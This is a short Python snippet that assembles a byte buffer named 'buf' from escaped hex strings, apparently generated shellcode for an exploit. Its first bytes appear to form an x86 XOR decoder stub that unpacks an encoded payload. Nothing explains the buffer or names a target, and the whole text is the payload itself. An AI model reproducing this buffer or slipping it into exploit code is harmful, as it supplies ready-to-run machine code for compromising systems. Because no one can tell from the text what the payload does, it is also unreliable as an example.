buf =  b""
buf += b"\x2b\xc9\x83\xe9\xba\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\xda\xf8\xbf\x88\x83\xee\xfc\xe2\xf4"
buf += b"\x03\x13\x24\x51\xae\xdc\x4b\xb9\x08\x4a\xc8\xb9"
buf += b"\x13\x9c\x34\xf9\xea\x73\xc9\x84\x51\x8e\xa3\x03"
buf += b"\x9c\xf0\x34\xf6\xfa\x73\x89\xb0\x95\xe0\xca\x7b"
buf += b"\x83\xf9\x6e\x77\x3b\x98\x34\xe4\xfe\xdc\x34\xcd"
buf += b"\xe6\x73\xeb\xa0\xa2\xf9\x55\x03\x90\xe0\x34\xd2"
buf += b"\xfa\xf9\x54\x6b\xee\xb1\x34\xbc\x51\xf9\x51\xb9"
buf += b"\x25\xc9\x7f\x74\x76\x7c\x7f\xfc\xdd\x39\x70\x85"
buf += b"\xdb\x3f\x54\x7c\xe1\x84\x9b\xa0\xaf\x19\x34\xd2"
buf += b"\xfe\xf9\x54\xee\x51\xf4\xf4\x03\x80\xe4\xbe\x63"
buf += b"\x51\xfc\x34\x89\x32\x71\xfb\xac\xc6\x99\x7c\x3a"
buf += b"\xd2\xd1\x6b\x01\x3f\x71\x7d\xe0\x54\xb6\xb1\x64"
buf += b"\x88\x10\x20\x77\x25\x07\x36\xcd\xde\x43\xc1\x50"
buf += b"\x38\x8b\x38\x94\xfe\xaa\x57\x06\x25\x07\x40\x01"
buf += b"\x9f\xf0\xd7\xe4\xb6\xd8\xfe\xe0\xe9\xca\x91\xec"
buf += b"\xb2\x8d\xcc\xed\xa8\xc8\x64\x00\x86\xdc\xb5\x01"
buf += b"\x3c\xae\x40\xdd\xde\x71\x7d\xd8\x61\x50\x1d\xc5"
buf += b"\x66\x7f\xa3\xac\x88\x10\xe0\x77\x25\x07\xd7\xe7"
buf += b"\xa2\xa0\x9f\xe0\xbb\x9f\xda\xca\xb2\xb5\xda\xfb"
buf += b"\xa9\xc9\x64\x00\x86\xdc\xb5\x01\x39\x90\xd3\xd0"
buf += b"\xfa\xd8\xd7\xe5\xb8\x8d\xd3\xe0\xfa\xac\xcd\xfd"
buf += b"\xb2\xb2\xd0\xed\xa3\x90\x9f\xe1\xa9\xd8\xd7\xdc"
buf += b"\xb2\x91\xcc\xb9\x13\x70\xf3\xac\xcf\x71\x5e\xb9"
buf += b"\x08\xaa\xec\xd9\x88\x07\x6f\xb9\x1a\xa8\x40\xdd"
buf += b"\xd2\xf8\xbf\x88"
